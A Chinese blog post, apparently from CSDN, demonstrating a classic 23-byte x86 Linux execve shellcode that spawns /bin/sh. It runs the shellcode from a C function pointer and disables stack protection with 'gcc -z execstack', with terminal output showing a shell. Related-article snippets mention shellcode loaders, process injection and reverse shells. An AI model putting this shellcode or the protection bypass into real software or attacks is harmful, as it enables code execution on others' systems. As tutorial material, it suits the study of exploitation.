linux下执行shellcode

最新推荐文章于 2023-07-30 23:18:48 发布
最新推荐文章于 2023-07-30 23:18:48 发布
阅读量5.3k 收藏 2
点赞数
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8536063
版权

参考了其他文章。

 

C语言代码如下:

#include <stdio.h>
#include <string.h>
char sc[] =
  "\x31\xc0"
  "\x50"
  "\x68\x6e\x2f\x73\x68"
  "\x68\x2f\x2f\x62\x69"
  "\x89\xe3"
  "\x50"
  "\x53"
  "\x89\xe1"
  "\xb0\x0b"
  "\xcd\x80";
int main()
{
  void (*fp)(void) = (void (*)(void))sc;

  printf("Length: %d\n",strlen(sc));
  fp();
}


上面的sc就是shellcode。源代码保存为execve.c,然后编译、连接。

[yang@localhost ~]$ gcc -o execve execve.c 
[yang@localhost ~]$ ./execve 
Length: 23
娈甸敊璇
[yang@localhost ~]$


结果如上,没有执行shellcode,怎么回事?我的gcc版本是4.3.0的。这个版本的gcc,编译出来的可执行文件的堆栈段,是不可执行的。

加上参数-z execstack就能变成可执行了。

[yang@localhost ~]$ gcc -z execstack -o execve execve.c 
[yang@localhost ~]$ ./execve 
Length: 23
sh-3.2$


获得了一个shell

 

 

feier7501
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
第15节 编写shellcode加载器
imbyter师哥的博客
05-14 342
我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。我们编写一个最简单的shellcode加载工具,应用于将本地的shellcode文件执行起来。一个人走得再快,不如一群人走得更远!
ShellcodeExec: 一个强大的Linux shellcode执行工具
最新发布
gitblog_00019的博客
03-14 370
ShellcodeExec: 一个强大的Linux shellcode执行工具 ShellcodeExec是一个功能强大的Python脚本,用于在Linux系统中执行shellcode。它不仅可以帮助你更轻松地运行shellcode,而且还提供了许多高级功能,如将shellcode注入到进程、生成PE文件等。 使用场景 ShellcodeExec可以用于各种安全研究和渗透测试任务。例如: 在目标...
shcode2exe:从Windows或LinuxShellcode编译为exe文件
03-04
shcode2exe(shellcode到exe) 从Windows或LinuxShellcode编译为exe文件。 特征 可以接受shellcode blob或字符串(字符串格式\x5e\x31 ) 可以针对32位或64位Windows体系结构。 跨平台。 在Linux或Windows上均可使用。 在Linux上运行时不依赖Wine 经过测试可使用Python v3.3及更高版本 经过测试,可以在Windows 7(非SP1)及更高版本上运行 主要用于恶意软件分析,但也可以用于漏洞利用开发。 受启发。 依存关系 对于Linux,请通过软件包管理器安装上述依赖项。 $ sudo apt install nasm $ sudo apt install binutils 对于Windows,您可以从安装nasm。 对于链接器,可以通过安装获得ld.exe的64位版本。 作为替
书写Linux下自己的shellcode
南飞的侯鸟
03-12 1058
 原    作:aleph1 翻译注释:warning3  1999/07 验证修改:scz  2000/01/13 概述:     aleph1书写了这篇经典文章,首先要向他致敬。     tt整
linux下端口绑定shellcode编写与实现
weixin_33695082的博客
01-08 682
  本次实验都是基于《灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术》 实现端口绑定shellcode有下面几个步骤: (1)     创建一个TCP套接字; (2)     将该套接字绑定到攻击者指定的端口,这个端口通常会被硬编码到shellcode中; (3)     让该套接字成为侦听套接字; (4)     接受新连接; (5)     将新接受的套接字复制到s...
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3168
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
将shllcode注入Linux中正在运行的进程(C/C++代码实现)
chen1415886044的博客
07-30 913
进程注入是一种在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可以允许访问该进程的内存、系统/网络资源,以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测,因为在合法进程下执行是被掩盖的。 有许多不同的方法可以将代码注入进程,其中许多方法滥用合法功能。这些实现适用于每个主要的操作系统,但通常是特定于平台的。 更复杂的样本可以利用命名管道或其他进程间通信(IPC)机制作为通信信道来执行对分段模块的多个进程注入,并进一步逃避检测。
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
5. **测试和调试**:在沙箱环境或模拟器中测试shellcode,确保其在预期环境下能正确工作。 学习和理解shellcode编写不仅可以帮助安全研究人员更好地了解和防御黑客攻击,也有助于逆向工程师和软件开发者增强对底层...
Shellcode-Extractor:Python脚本从Linux执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
SLAE64:x64 Linux Shellcode
07-04
SLAE64,全称是“64位结构化低级编程认证”(64-bit Structure of Applied Encryption),是一项专注于安全领域低级编程技术的认证,特别是涉及到x64架构下的Linux shellcode编写。Shellcode是一种特殊的恶意代码,...
CDL_shellcode_源码
10-02
JavaScript Shellcode虽然不如传统操作系统(如Windows、Linux)中的Shellcode常见,但在某些场景下,如浏览器环境或Node.js环境中,它可以非常有效。JavaScript Shellcode允许攻击者通过网页或Web应用程序来控制...
Linux x86_64 shellcode的编写
小立仔
07-06 1336
Linux x86_64 shellcode的编写
shellcode_在Linux上测试Shellcode
weixin_26722031的博客
08-02 195
shellcodeSomething quick that I picked up while learning about linux assembly exploitation — it is a right pain to test shellcode using a C program, because you need to do the following: 我在学习linux程序集开...
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
「鸿渐之翼」的博客
04-29 2389
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) * reverse shell tcp (1907) port shellcode C language - Linux/x86_64 Author : Kağan Çapar contact:
linux编写shellcode
duangduang2020的博客
11-21 1033
1、shellcode需要用到系统调用的调用号,可以通过unistd.h查看,具体某个系统调用的用法可以通过man syscall来查看 2、在现在的指令集中引入了syscall指令,但是原来的int 0x80调用正常可以使用。int 0x80调用将系统调用号放在eax, 参数依次放在ebx, ecx, edx, esi, edi;超过5个的将参数放在内存中,并将内存地址放在ebx寄存器中。 (
Linuxshellcode的编写
weixin_30387663的博客
04-30 741
Linuxshellcode的编写 来源https://xz.aliyun.com/t/2052 EdvisonV/2018-02-14 22:00:42/浏览数 6638技术文章技术文章 0x01 理解系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。那么为什么要写sh...
Linux Shellcoding学习
一根火柴博客
05-17 1241
Linux系统Shellcoding编程入门
Linux 系统下提取 ShellCode
热门推荐
CSDN
08-29 1万+
提取 Shellcode 是一种将特定功能的汇编指令序列提取成二进制代码的过程,通常用于计算机安全研究和渗透测试。代码提权思路,下面这段代码配合 chmod u+s 权限的设置,可以提权,我们可以将这段代码的汇编格式提取出来,然后将其注入到passwd等具有特权指令的目录下,然后就能完成权限的提升了。如果需要提取shellcode的话应该使用汇编来写提权代码,如下代码就是一段提权代码。发现能够获取到Root目录的权限,接着直接查询生成的机器码。接着就是测试这段代码的可用性了,如下代码;
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值